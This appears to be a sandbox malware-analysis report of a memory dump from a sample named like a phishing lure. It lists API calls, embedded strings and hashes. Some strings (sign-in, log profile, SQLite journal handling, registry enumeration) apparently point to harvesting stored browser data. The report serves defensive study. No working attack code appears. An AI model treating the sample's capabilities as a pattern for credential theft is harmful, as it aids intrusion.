                                                            • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                            • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                            APIs
                                                            • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                            • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                            • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                            • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                            • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                            • memset.MSVCRT ref: 0041BA3D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: -journal$-wal
                                                            • API String ID: 438689982-2894717839
                                                            • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                            • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                            • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                            • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                            • EndDialog.USER32(?,00000002), ref: 00405C83
                                                            • EndDialog.USER32(?,00000001), ref: 00405C98
                                                              • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                              • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                            • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                            • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Item$Dialog$MessageSend
                                                            • String ID:
                                                            • API String ID: 3975816621-0
                                                            • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                            • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                            • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                            • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                            APIs
                                                            • _wcsicmp.MSVCRT ref: 00444D09
                                                            • _wcsicmp.MSVCRT ref: 00444D1E
                                                            • _wcsicmp.MSVCRT ref: 00444D33
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _wcsicmp$wcslen$_memicmp
                                                            • String ID: .save$http://$https://$log profile$signIn
                                                            • API String ID: 1214746602-2708368587
                                                            • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                            • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                            • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                            • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                            • memset.MSVCRT ref: 00405E33
                                                            • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                            • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                            • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                            • String ID:
                                                            • API String ID: 2313361498-0
                                                            • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                            • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                            • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                            • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                            APIs
                                                            • GetClientRect.USER32(?,?), ref: 00405F65
                                                            • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                            • GetWindow.USER32(00000000), ref: 00405F80
                                                              • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                            • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                            • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                            • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                            • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageRectSend$Client
                                                            • String ID:
                                                            • API String ID: 2047574939-0
                                                            • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                            • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                            • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                            • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                            APIs
                                                            • GetSystemTime.KERNEL32(?), ref: 00418836
                                                            • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                            • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                            • GetTickCount.KERNEL32 ref: 0041887D
                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                            • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                            • String ID:
                                                            • API String ID: 4218492932-0
                                                            • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                            • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                            • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                            • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                            APIs
                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                              • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                              • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                            • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                            • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                              • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                            • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                            • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                            • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                             • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                             • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID: gj
                                                            • API String ID: 438689982-4203073231
                                                            • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                            • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                            • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                            • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                            APIs
                                                            • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                            Strings
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                            APIs
                                                            • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                            • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                            • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                            • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                            • memset.MSVCRT ref: 00405ABB
                                                            • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                            • SetFocus.USER32(?), ref: 00405B76
                                                            Similarity
                                                            • API ID: MessageSend$FocusItemmemset
                                                            • String ID:
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _snwprintfwcscat
                                                            • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                            • String ID: 0$6
                                                            APIs
                                                              • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                            • memset.MSVCRT ref: 00405455
                                                            • memset.MSVCRT ref: 0040546C
                                                            • memset.MSVCRT ref: 00405483
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                            Strings
                                                            Similarity
                                                            • API ID: memset$memcpy$ErrorLast
                                                            • String ID: 6$\
                                                            APIs
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                            • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                            • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                            • wcscpy.MSVCRT ref: 0040A0D9
                                                            • wcscat.MSVCRT ref: 0040A0E6
                                                            • wcscat.MSVCRT ref: 0040A0F5
                                                            • wcscpy.MSVCRT ref: 0040A107
                                                            Similarity
                                                            • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                            • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                            Strings
                                                            Similarity
                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                            • String ID: advapi32.dll
                                                            APIs
                                                            Strings
                                                            • <%s>, xrefs: 004100A6
                                                            • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                            • <?xml version="1.0" ?>, xrefs: 0041007C
                                                            Similarity
                                                            • API ID: memset$_snwprintf
                                                            • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: wcscat$_snwprintfmemset
                                                            • String ID: %2.2X
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: _snwprintfwcscpy
                                                            • String ID: dialog_%d$general$menu_%d$strings
                                                            APIs
                                                            • strlen.MSVCRT ref: 00408DFA
                                                              • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                                                            • memset.MSVCRT ref: 00408E46
                                                            • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                                                            • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                                                            • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                                                            • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                                                            • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                                                            Similarity
                                                            • API ID: memcpy$memsetstrlen
                                                            • String ID:
                                                            APIs
                                                            Strings
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                            APIs
                                                            • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                                                            • memset.MSVCRT ref: 00408FD4
                                                            • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                                                            • memset.MSVCRT ref: 00409042
                                                            • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                                                              • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                                                            Similarity
                                                            • API ID: memcmpmemset$_mbscpymemcpystrlen
                                                            • String ID:
                                                            APIs
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                              • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                              • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                            • memset.MSVCRT ref: 0040C439
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                            • _wcsupr.MSVCRT ref: 0040C481
                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                            • memset.MSVCRT ref: 0040C4D0
                                                            • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Similarity
                                                            • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                            • String ID:
                                                            • API String ID: 4131475296-0
                                                            APIs
                                                            • memset.MSVCRT ref: 004116FF
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                              • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                              • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                              • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                              • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                              • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                              • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                              • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                              • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                              • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                              • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                            Strings
                                                            Similarity
                                                            • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                            • API String ID: 2618321458-3614832568
                                                            APIs
                                                            Similarity
                                                            • API ID: AttributesFilefreememset
                                                            • String ID:
                                                            • API String ID: 2507021081-0
                                                            APIs
                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                            • malloc.MSVCRT ref: 00417524
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                            • free.MSVCRT ref: 00417544
                                                            • free.MSVCRT ref: 00417562
                                                            Similarity
                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                            • String ID:
                                                            • API String ID: 4131324427-0
                                                            APIs
                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                            • free.MSVCRT ref: 0041822B
                                                            Strings
                                                            Similarity
                                                            • API ID: PathTemp$free
                                                            • String ID: %s\etilqs_$etilqs_
                                                            • API String ID: 924794160-1420421710
                                                            APIs
                                                            • memset.MSVCRT ref: 0040FDD5
                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                            Strings
                                                            Similarity
                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                            • API String ID: 1775345501-2769808009
                                                            APIs
                                                            • wcscpy.MSVCRT ref: 0041477F
                                                            • wcscpy.MSVCRT ref: 0041479A
                                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                            Strings
                                                            Similarity
                                                            • API ID: wcscpy$CloseCreateFileHandle
                                                            • String ID: General
                                                            • API String ID: 999786162-26480598
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                            • _snwprintf.MSVCRT ref: 0040977D
                                                            • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                            Strings
                                                            Similarity
                                                            • API ID: ErrorLastMessage_snwprintf
                                                            • String ID: Error$Error %d: %s
                                                            • API String ID: 313946961-1552265934
                                                            Strings
                                                            Similarity
                                                            • API ID:
                                                            • String ID: foreign key constraint failed$new$oid$old
                                                            • API String ID: 0-1953309616
                                                            APIs
                                                            Strings
                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                            • API String ID: 3510742995-272990098
                                                            APIs
                                                            • memset.MSVCRT ref: 0044A6EB
                                                            • memset.MSVCRT ref: 0044A6FB
                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                            Strings
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: gj
                                                            • API String ID: 1297977491-4203073231
                                                            APIs
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                            • free.MSVCRT ref: 0040E9D3
                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                            Similarity
                                                            • API ID: ??3@$free
                                                            • String ID:
                                                            • API String ID: 2241099983-0
                                                            APIs
                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                            • malloc.MSVCRT ref: 004174BD
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                            • free.MSVCRT ref: 004174E4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                            • String ID:
                                                            • API String ID: 4053608372-0
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0040D453
                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
